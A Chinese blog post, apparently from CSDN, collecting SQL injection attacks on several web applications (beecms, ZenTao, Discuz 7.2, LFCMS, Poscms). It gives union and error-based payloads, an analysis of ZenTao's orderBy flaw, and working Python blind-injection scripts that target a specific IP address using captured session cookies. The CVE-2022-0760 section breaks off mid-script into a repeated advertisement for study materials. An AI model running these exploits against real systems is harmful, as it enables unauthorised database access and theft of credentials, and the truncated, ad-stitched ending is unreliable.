sql注入合集_禅道sql注入,2024年最新真香系列

于 2024-04-13 23:50:24 发布
阅读量354 收藏 3
点赞数 4
分类专栏: 2024年程序员学习 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83947048/article/details/137728971
版权 
1 and exists(select *from admin) 存在admin user product user news book

1 and exists(select password from admin)  #id,data,username,password,

1 order by 12  #字段数是11 

1  union select 1,2,3,4,5,6,7,8,9,10,11 from admin #2,3号位显示

1 union select 1,username,password,4,5,6,7,8,9,10,11 from admin

在这里插入图片描述

五、beecms注入

admin' a and nd updatexml(1,concat(0x7e,(select database()),0x7e),1)#


admin' a and nd updatexml(1,concat(0x7e,(selselectect  group_concat(table_name) fr from om information_schema.tables wh where ere table_schema like database()),0x7e),1)# //bees\_admin,bees\_admin\_group,bee


admin' a and nd updatexml(1,concat(0x7e,(selselectect group\_concat(column\_name) fr from om information\_schema.columns wh where ere table\_schema like database()),0x7e),1)# //id,admin\_name,admin\_password,ad



admin' a and nd updatexml(1,concat(0x7e,(selselectect  group_concat(admin_name,admin_password) fr from om bees.bees_admin ),0x7e),1)#

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

尝试写shell没成功,可能是prev没开。

七、禅道sql注入

file

class block extends control
{
public function \_\_construct($moduleName = '', $methodName = '')
{
parent::\_\_construct($moduleName, $methodName);
$this->selfCall = strpos($this->server->http\_referer, common::getSysURL()) === 0 || $this->session->blockModule;
if($this->methodName != 'admin' and $this->methodName != 'dashboard' and !$this->selfCall and !$this->loadModel('sso')->checkKey()) die('');
}
public function main($module = '', $id = 0)
{
    
    $mode = strtolower($this->get->mode);
    if($mode == 'getblocklist')
    {   
    }   
    elseif($mode == 'getblockdata')
    {   
        $code = strtolower($this->get->blockid);

        $params = $this->get->param;
        $params = json\_decode(base64\_decode($params));     
        $this->viewType   = (isset($params->viewType) and $params->viewType == 'json') ? 'json' : 'html';
        $this->params     = $params;
        $this->view->code = $this->get->blockid;

        $func = 'print' . ucfirst($code) . 'Block';
        if(method\_exists('block', $func))
        {
            $this->$func($module);
        }
        else
        {
            $this->view->data = $this->block->$func($module, $params);
        }
    }
}

先对Referer进行了判断,如果不正确,直接die(),通过判断mode=getblockdata进入分支,传入blockid=case调用进入printcaseBlock
()函数

public function printCaseBlock()
{
    if($this->params->type == 'assigntome')
    {
        
    }
    elseif($this->params->type == 'openedbyme')
    {
        $cases = $this->dao->findByOpenedBy($this->app->user->account)->from(TABLE\_CASE)
            ->andWhere('deleted')->eq(0)
            ->orderBy($this->params->orderBy)
            ->beginIF($this->viewType != 'json')->limit($this->params->num)->fi()
            ->fetchAll();
    }
    $this->view->cases    = $cases;
}

判断params中的type值,传openedbyme从而进入orderBy()漏洞函数。

public function orderBy($order)
{
    if($this->inCondition and !$this->conditionIsTrue) return $this;

    $order = str\_replace(array('|', '', '\_'), ' ', $order);
    $pos    = stripos($order, 'limit');
    $orders = $pos ? substr($order, 0, $pos) : $order;
    $limit  = $pos ? substr($order, $pos) : '';
    $orders = trim($orders);
    if(empty($orders)) return $this;
    if(!preg\_match('/^(\w+\.)?(`\w+`|\w+)( +(desc|asc))?( \*(, \*(\w+\.)?(`\w+`|\w+)( +(desc|asc))?)?)\*$/i', $orders)) die("Order is bad request, The order is $orders");

    $orders = explode(',', $orders);
    foreach($orders as $i => $order)
    {
        $orderParse = explode(' ', trim($order));
        foreach($orderParse as $key => $value)
        {
            $value = trim($value);
            if(empty($value) or strtolower($value) == 'desc' or strtolower($value) == 'asc') continue;

            $field = $value;
            /\* such as t1.id field. \*/
            if(strpos($value, '.') !== false) list($table, $field) = explode('.', $field);
            if(strpos($field, '`') === false) $field = "`$field`";

            $orderParse[$key] = isset($table) ? $table . '.' . $field :  $field;
            unset($table);
        }
        $orders[$i] = join(' ', $orderParse);
        if(empty($orders[$i])) unset($orders[$i]);
    }
    $order = join(',', $orders) . ' ' . $limit;

    $this->sql .= ' ' . DAO::ORDERBY . " $order";
    return $this;
}

先将order中的|,_置换为空格,然后取第一次出现limit的位置,取值,对orders进行了正则匹配和处理,但是没有对limit进行处理,最后又把limit拼接到了ORDERBY语句中执行,导致了注入产生。

import base64
payload=b"""{"orderBy":"order limit 1;select (if(ascii(substr((select database()),1,1))>0,sleep(5),1))-- ","num":"1,1","type":"openedbyme"}"""
base64encode_str = base64.b64encode(payload)
print(base64encode_str)

file

执行时间达到5秒多,说明sql语句被执行了。

import base64
import time
import requests
payload=b"""{"orderBy":"order limit 1;select (if(ascii(substr((select database()),1,1))>0,sleep(5),1))-- ","num":"1,1","type":"openedbyme"}"""


headers={
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
    'Cookie':'lang=zh-cn; theme=default; lastProduct=2; think\_template=default; SECKEY\_ABVK=sDKUFx0SI2QxP1RGsU9FV8qwP8TB8dsS5s540TBV5ms%3D; BMAP\_SECKEY=nYO150H6Wi-DT3mcAEoVLuT4r9CzC0S\_Eze5tiiPyKXCUefAwVqUS-S\_D0\_0HfTtRUfRKLcQj3Zv0etp0wI6U-T73zjNXiLh\_qCw8wxeIpYFhypp0iO4bRF5Z3Ybzte2BZQ9s7kcW32CL8iYEboDZNuDwUK6ApljNJr9yVz1spj8X9DACSY7j3raFA27vDw0; ASPSESSIONIDAQDDSBSS=GNHNFOMAHBLKHHMNBFNMEBMK; ASPSESSIONIDCQCCRATT=LBBHAMNAMBAOIMDHBFADKHLM; sid=abi792kma4oc97llvmdegnstt5; windowWidth=692; windowHeight=711; PHPSESSID=p9a6umsf1ajbc3d4tm5k9ge676; Hm\_lvt\_b60316de6009d5654de7312f772162be=1678363323; Hm\_lpvt\_b60316de6009d5654de7312f772162be=1678363707; f814212a5b521d45bd53097f6a4a5fdb\_ci\_session=d25dvapp153pkttr7sp9rrpak9hisg2i; lf\_users\_\_\_forward\_\_=%2Findex.php%3Fs%3D%2Flists%2Findex%2Fid%2F55.html',
    'Referer': 'http://110.40.154.212:8081/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtzZWxlY3QgKGlmKGFzY2lpKHN1YnN0cigoc2VsZWN0IGRhdGFiYXNlKCkpLDEsMSkpPjY0LHNsZWVwKDUpLDEpKS0tICIsIm51bSI6IjEsMSIsInR5cGUiOiJvcGVuZWRieW1lIn0='
}
result = ''
for times in range(1, 88):
    min = 0
    max = 128
    mid = (min + max) // 2
    while min < max:
        payload = '{'+f'"orderBy":"order limit 1;select (if(ascii(substr((select database()),{times},1))>{mid},sleep(5),1))-- ","num":"1,1","type":"openedbyme"' +'}'
        base64encode_str = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        url="http://110.40.154.212:8081/index.php?m=block&f=main&mode=getblockdata&blockid=case&param="+base64encode_str
        startTime = time.time()
        resp = requests.get(url,headers=headers)
        if time.time()-startTime > 3:
            min = mid + 1
        else:
            max = mid
        mid = (min + max) // 2
    result += chr(min)
    print(result)

file

八、Discuz7.2

function implodeids($array) {
	if(!empty($array)) {
		return "'".implode("','", is\_array($array) ? $array : array($array))."'";
	} else {
		return '';
	}
}

漏洞成因是impledeids将$groupids数组用,分隔开,组成了类似于’1’,‘2’,‘3’,‘4’,这样的字符返回,刚取出第一个转义符,会将正常的’转义,编程’1’,‘’,‘3’,‘4’,从而导致第三个引号和第五个引号闭合成功,3成功逃逸。

file

payload如下:

import re

import requests

s=requests.session()

headers={
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'
}
url="http://110.40.154.212:8041/faq.php?action=grouppermission&gids[9]=%27&gids[10][0]="
#payload=") and updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+"
payload=")%20and%20updatexml(1,concat(0x7e,(select%20table\_name from information\_schema.tables where table\_schema=database() limit 1,1),0x7e),1)--+"
url=url+payload
resp=s.get(url,headers=headers)
obj=re.compile(r'.\*?XPATH syntax error: (?P<name>.\*?)<br />.\*?')
result3 = obj.search(resp.text)
print(result3.group("name"))

九、Poscms

file

弱口令 admin admin

十、LFCMS

file

import time

import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
    'Cookie': 'lang=zh-cn; theme=default; lastProduct=2; think\_template=default; SECKEY\_ABVK=r765x/a4GpSgTpZWaXpRMHGkAr7A4jYs9j+/yYIFI7Y%3D; BMAP\_SECKEY=Z87tl5vu1Tck9\_\_fh5HGqx6jV4LMqg2iVrfDcWFYuWoF3KRhPMPWQDJK0UN3Rb\_WfQH6WOFCQ58HM\_bVAAO1ybF4klLwASuNrZ58kxks8KcFKBrZLKog6RbpZMwnRPdf0gPtuf\_jkc3L4IfZPBOFxulTgRykV0wGZViV3ogirrqFatnGW5Kbam1L3iZgBr6b; Hm\_lvt\_b60316de6009d5654de7312f772162be=1678712949,1678717766,1678718983,1678720108; Py1\_sid=moGWFy; Py1\_visitedfid=2; f814212a5b521d45bd53097f6a4a5fdb\_ci\_session=qphormh4vscqqohbil540na3eqmijksd; member\_uid=1; member\_cookie=8f85827484437f675f15; finecms-admin-login=admin; PHPSESSID=kgaha0hgok2fobjk7ic4pb0292; lf\_users\_\_\_forward\_\_=%2Findex.php%3Fs%3D%2Flists%2Findex%2Fid%2F4.html'
}
flag = ''
for times in range(1, 10):
    count = 1
    for j in range(1,130):
        url = f'http://110.40.154.212:8070/index.php/Ajax/randMovie?limit=1&category=1%20AND%20(SELECT%208586%20FROM%20(SELECT(if(STRCMP({count},ORD(MID((SELECT%20DATABASE()),{times},1))),sleep(5),1)))YVDz)'
        #1 AND (SELECT 8586 FROM (SELECT(if(STRCMP(2,ORD(MID((select table\_name from information\_schema.tables where table\_schema=database() limit 0,1),1,1))),sleep(5),1)))YVDz) 爆表
        startTime = time.time()
        resp = requests.get(url, headers=headers)
        if time.time() - startTime > 3:
            count += 1
        else:
            flag += chr(count)
            break
        time.sleep(1)
    print(flag)

file

十一、CVE-2022-0760

import requests


**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/7bc95904bf4e2182849f45f0cc8acb37.png)
![img](https://img-blog.csdnimg.cn/img_convert/85f4727c5d6b09de116cdfd53b5caa5e.png)
![img](https://img-blog.csdnimg.cn/img_convert/eb540c3c72b501e56ae71cd87a861c30.png)
![img](https://img-blog.csdnimg.cn/img_convert/db70976cde20ae582d9873ff619b52be.png)
![img](https://img-blog.csdnimg.cn/img_convert/73c4dbb7e53381324f1801f397f1f2bd.png)
![img](https://img-blog.csdnimg.cn/img_convert/9c8a99014ceaf5d81280adb69dd01622.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**

**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**

**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
![img](https://img-blog.csdnimg.cn/img_convert/e1afba59235052d6f6814d065abe2be8.png)



### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料

**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
![img](https://img-blog.csdnimg.cn/img_convert/8d7ad4523fd92499b3155a8669b45833.png)

跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料

**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中...(img-RxgqnjAw-1713023406964)]
2401_83947048
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
禅道826版本SQL注入,登录绕过以及禅道826后台GetShell的小技巧
weixin_54556126的博客
02-26 1194
SQL注入由 orderBy($order) 函数过滤不严格导致。但是,这个函数对传进的参数进行了一系列过滤,导致 getshell 的条件比较苛刻。不甘心,于是乎找了一个比较好利用的地方。我只是以这个模块的一个函数为例,其它未提到的地方仍然很有可能存在注入。   一、问题的根源   问题出现在 limit($limit) 函数,它对传进的参数没有经过任何过滤就直接拼接成SQL语句进行查询。 // D:\wamp\www\zentao826\lib\base\dao\dao.class.php
禅道16.5 SQL注入(CNVD-2022-42853)
qq_50854662的博客
02-15 924
禅道16.5 SQL注入(CNVD-2022-42853)
探索ZentaoSqli:一款强大的禅道SQL注入检测工具
最新发布
gitblog_00059的博客
04-05 339
探索ZentaoSqli:一款强大的禅道SQL注入检测工具 项目地址:https://gitcode.com/z92g/ZentaoSqli 项目简介 ZentaoSqli 是一个专门为禅道(Zentao)开源项目定制的SQL注入检测工具。它旨在帮助开发者和安全团队识别并修复禅道系统中可能存在的SQL注入漏洞,提升系统的安全性。通过自动化扫描和精确的漏洞检测,ZentaoSqli使得维护大型项目的...
超详细!!!linux系统禅道安装及常见问题解决
m0_54783143的博客
05-20 2355
首先可以查看一下状态(注意看Current mode的状态)关闭前Current mode的状态为 enforcing。大概率是因为禅道所在电脑的防⽕墙和selinux未关闭。之后再关闭selinux(可临时关闭也可以永久性关闭)(之前很早下载过所以和上面显示的版本比相同)最好把防火墙开机自启也关闭,避免不必要的麻烦。再次查看状态(请记得重启reboot)最后,再次通过浏览器访问禅道!再次查看防火墙状态(已关闭)4.查看服务器IP的方法。5.浏览器直接访问即可。1.解压禅道的压缩包。首先查看防火墙的状态。
禅道V16.5SQL注入漏洞(CNVD-2022-42853)
RestoreJustice的博客
03-23 722
禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行,攻击者可利用漏洞获取数据库敏感信息。
SQL.rar_sql injection_sql 注入_sql注入
09-14
SQL注入是一种常见的网络安全威胁,它发生在应用程序不恰当地构建SQL查询语句时,允许攻击者通过输入恶意数据来操纵数据库。在"SQL.rar"中,我们看到与SQL注入相关的资源,包括一个名为"SQL.cpp"的C++源代码文件,这...
sql.rar_SQL防注入_asp 防注入_sql注入_防破
09-22
同时,定期更新和打补丁,保持服务器软件和数据库管理系统处于最新状态,也是防御SQL注入的重要步骤。 在“sql.txt”文件中,可能包含了具体的示例代码或者技巧,比如使用参数化查询的ASP代码片段,或者是ASP中进行...
SQL_zhuru.rar_sql 注入_sql注入
09-24
在"SQL_zhuru.rar_sql注入_sql注入"这个压缩包中,可能包含了关于如何识别、预防和应对SQL注入攻击的相关资料。 在"www.pudn.com.txt"文件中,可能包含了从Pudn网站下载的关于SQL注入的技术文章、教程或案例分析。...
SQL.rar_sql注入_网络安全_网络安全 试题
09-20
SQL注入是一种常见的网络安全威胁,它发生在应用程序不恰当地处理用户输入的数据时,导致攻击者能够构造恶意的SQL命令,从而获取、修改、删除或者控制数据库中的敏感信息。在这个"SQL.rar"压缩包中,我们有两个文件...
php中sql注入漏洞示例 sql注入漏洞修复
10-26
主要介绍了php中sql注入漏洞示例,大家在开发中一定要注意
fangsqlzhuru.rar_sql injection_sql注入_万能
09-22
描述中提到的“万能Asp防SQL注入代码”,意味着这个压缩包可能包含了适用于ASP(Active Server Pages)开发环境的SQL注入防护代码。ASP是一种微软开发的服务器端脚本语言,常用于构建动态网站和Web应用程序。由于SQL...
sql注入合集
Aiwin的博客
05-08 901
sql注入合集,持续收集。
禅道研发项目管理系统命令注入漏洞(MPS-2023-0418)
murphysec的博客
01-09 1323
禅道是一款国产开源项目管理软件。 禅道研发项目管理系统存在系统命令注入漏洞,具有后台登陆权限的攻击者可以利用此漏洞执行任意命令,进而控制服务器。
SQL注入到Getshell:记一次禅道系统的渗透
dengzhasong7076的博客
03-08 1518
此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。 目前确认8.2 - 9.2.1存在问题 确认版本 首先可以通过接口来确认一下当前禅道的版本。 http://example.com/index.php?mode=getconfig SQL注入分析 网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2....
禅道8.2-9.2.1注入GetShell
weixin_33966365的博客
03-06 4127
· 漏洞分析附上某老哥的漏洞分析,来了解下原理。· 漏洞利用查看版本:访问Url:http://127.0.0.1/zentao/index.php?mode=getconfig即可获取禅道的版本号以及一些其他的信息,目前漏洞存在于v8.2~v9.2确定版本号之后,我们就可以尝试GetShell利用漏洞,根据另一个老哥博客提供的***方法获取站点路径然后注入一句话***...
ThinkPHP最新版本SQL注入漏洞
weixin_30631587的博客
01-23 584
如下controller即可触发SQL注入: code 区域 public function test() { $uname = I('get.uname'); $u = M('user')->where(array( 'uname' => $uname ))->f...
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
pymssql中执行sql sever为什么会乱码_禅道免登陆SQL注入漏洞复现
weixin_39645249的博客
12-12 145
一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取w...
SQL注入 sql_delete_syntax
07-09
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而可以执行未经授权的操作或者获取敏感信息。 在谈论SQL注入时,"sql_delete_syntax"可能指的是SQL语句中的DELETE语法。DELETE语句用于从数据库中删除记录。 以下是一些常见的SQL删除语句的语法示例: 1. 删除整个表中的所有记录: DELETE FROM 表名; 2. 删除满足特定条件的记录: DELETE FROM 表名 WHERE 条件; 3. 删除具有特定主键值的记录: DELETE FROM 表名 WHERE 主键列 = 值; 请注意,这只是SQL删除语句的基本语法示例,并不代表完整的语法。在实际使用时,你需要根据数据库类型和表结构进行相应的调整。 对于防止SQL注入攻击,请使用参数化查询或预编译语句,并避免直接将用户输入拼接到SQL语句中。这样可以有效地防止恶意代码被插入到SQL语句中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值